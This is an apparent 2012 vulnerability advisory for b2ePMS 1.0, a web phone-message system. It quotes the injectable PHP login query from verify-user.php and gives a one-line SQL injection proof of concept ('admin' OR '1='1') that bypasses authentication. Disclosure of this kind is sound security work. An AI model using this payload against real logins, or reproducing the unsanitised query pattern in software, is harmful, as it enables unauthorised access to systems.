b2ePMS 1.0 Authentication Bypass Vulnerability

2012-06-03T00:00:00
ID SECURITYVULNS:DOC:28125
Type securityvulns
Reporter Securityvulns
Modified 2012-06-03T00:00:00

Description

b2ePMS 1.0 Authentication Bypass Vulnerability

Discovered by: Jean Pascal Pereira <pereira@secbiz.de>

Vendor Information:

"b2ePMS stands for Browser to Email Phone Message System. It is intended to replace the standard paper/carbon phone message slips commonly used in offices, with the capability of sending the message via a web browser form directly to the recipients inbox."

Vendor URI: https://developer.berlios.de/projects/b2epms/

Issue: SQL Injection, Authentication Bypass

Risk level: High

=> The remote attacker has the possibility to execute arbitrary SQL Code.

=> The remote attacker is able to bypass the user authentication.

In verify-user.php, line 20:


$sql = mysql_query("SELECT * FROM b2epms_user WHERE username='$username' AND user_passwd='$admin_passwd' AND activated='1' AND user_level='2'"); $login_check = mysql_num_rows($sql); if($login_check > 0){ while($row = mysql_fetch_array($sql)){ foreach( $row AS $key => $val ){ $$key = stripslashes( $val ); } // Register session variables! session_register('userid'); $_SESSION['userid'] = $user_level; mysql_query("UPDATE b2epms_user SET login_date=now() WHERE userid='$userid'"); $url = "Location: admin.php"; header($url); } }


Exploit / Proof Of Concept:

Perform a login with the following data:

Username: admin' OR '1='1 Password: x